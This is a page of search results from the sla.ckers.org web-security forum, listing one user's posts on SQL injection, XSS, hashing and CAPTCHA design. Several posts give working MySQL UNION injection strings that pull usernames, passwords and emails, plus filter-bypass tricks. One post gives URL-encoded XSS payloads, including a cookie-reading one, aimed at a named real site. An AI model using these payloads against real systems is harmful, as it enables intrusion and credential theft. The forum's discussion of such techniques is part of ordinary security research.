Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How robots and spiders are causing issues, how to stop them. We can also talk about Completely Automated Public Turing Test To Tell Computers And Humans Apart - their use, their compliance issues, porn proxies, PWNtcha and other ways to defeat them. 

Current Page: 1 of 1
Results 1 - 18 of 18
3 years ago
The-Wildcat
hm, it's also exploitable in FF3 but only with a click on the pager. In FF4, is it exploitable without user interaction? If so, how?^^
Forum: XSS Info
6 years ago
The-Wildcat
Hm, first of all read this: http://websec.wordpress.com/2007/11/17/mysql-into-outfile/ You need the FILE right, the full path to the file, mysql need read rights to the file and file size must be smaller than max_allowed_packet, otherwise mysql would not read the file. In case of "file not found" mysql4 respond ERROR 13 (HY000): Can't get stat of 'filepath' (Errcode: 2) Without FIL
Forum: SQL and Code Injection
6 years ago
The-Wildcat
Thats right, only INTO is possible or INTO @varname
Forum: SQL and Code Injection
6 years ago
The-Wildcat
Hehe i like this paranoid stuff ;) So you can use a per page salt (stored in defines or something similiar) rather than a per page method. Or combine both of them Or you can merge 2 (salted or anything else) MD5 substrings to obfuscate the used algorithm or something similiar ^^
Forum: Privacy
6 years ago
The-Wildcat
I think the only way is bruteforcing OR any kind like this /dispat.php?dp=-4 UNION SELECT (concat_ws(":",name,password,mail) FROM users LIMIT 1,1),2,3 FROM news /*
Forum: SQL and Code Injection
6 years ago
The-Wildcat
hehe show command didn't work there. It was only a note mysql 4 have only SHOW Commands. But this command don't work in SELECT or any other statement.
Forum: SQL and Code Injection
6 years ago
The-Wildcat
So if you try /dispat.php?dp=-4 UNION SELECT "test",2,3 FROM <replace by newstablename or something similar> /* do you see "test" on the page or not? SHOW command is used like described here http://dev.mysql.com/doc/refman/4.1/en/show.html like SHOW COLUMNS FROM mydb.mytable; show the columns from mytable and so on. SHOW GRANTS FOR 'root'@'localhost'; show
Forum: SQL and Code Injection
6 years ago
The-Wildcat
Try WHERE user = CHAR(97,100,109,105,110)
Forum: SQL and Code Injection
6 years ago
The-Wildcat
Hm yeah thats right, information_schema only available in MySql >= 5 MySql <= 4.1 use SHOW commands, u can't use show Commands in UNION statements, thats the problem (or not ;) seeing from a different angle) The datadir issue is a bug see: http://bugs.mysql.com/bug.php?id=1039 It's fixed in Mysql >=5 but MySql 4 is out of lifecycle. In Version <= 4.1.11b it is not fixed In mo
Forum: SQL and Code Injection
6 years ago
The-Wildcat
This could help http://websec.wordpress.com/2007/11/17/mysql-table-and-column-names/
Forum: SQL and Code Injection
6 years ago
The-Wildcat
Tried CONCAT_WS() !? mysql 5 don't support comments in keywords like S/**/E/**/LECT and so on.
Forum: SQL and Code Injection
6 years ago
The-Wildcat
Database query failed: Table 'db.BAD_TABLE_NAME' doesn't exist means there is no table like BAD_TABLE_NAME Its mysql? So look at information_schema.tables (version 5) or so Interesting for you http://websec.wordpress.com/2007/11/17/mysql-table-and-column-names/ "friends page" hehe
Forum: SQL and Code Injection
7 years ago
The-Wildcat
http://www.blog.de/login.php?login=%22%3E%3Cscript%3Ealert('omg');%3C/script%3E http://evil.hackademix.net/name.xss/***http://www.blog.de/srv/domains/search.php?domain_name=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3B%3C%2F%73%63%72%69%70%74%3E***content,post http://evil.hackademix.net/name.xss/***http://www.blog.de/srv/company/company.php?p
Forum: Full Disclosure
7 years ago
The-Wildcat
Nice one ;)
Forum: Full Disclosure
7 years ago
The-Wildcat
another alternative would be: click the intercept point of the two white circles (or any other specified color) Is this also easy to solve? http://ent.the-wildcat.de/captcha/alternative.php
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
The-Wildcat
Hm, this captcha isn't good for accessibility, thats true. But, you can implement "accessibility" by readjusting size of the circles.
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
The-Wildcat
Hm, thats bad. Here, a little smaller and a lot more circles http://ent.the-wildcat.de/captcha/index2.php Edit: To protect against bruteforcing by sending mouse coordinates, you can also add a form key
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
The-Wildcat
What about captchas like that: http://ent.the-wildcat.de/captcha/ Click the sectioned circle. Are there any robots to solve this?
Forum: Robots/Spiders/CAPTCHAs, oh my
Current Page: 1 of 1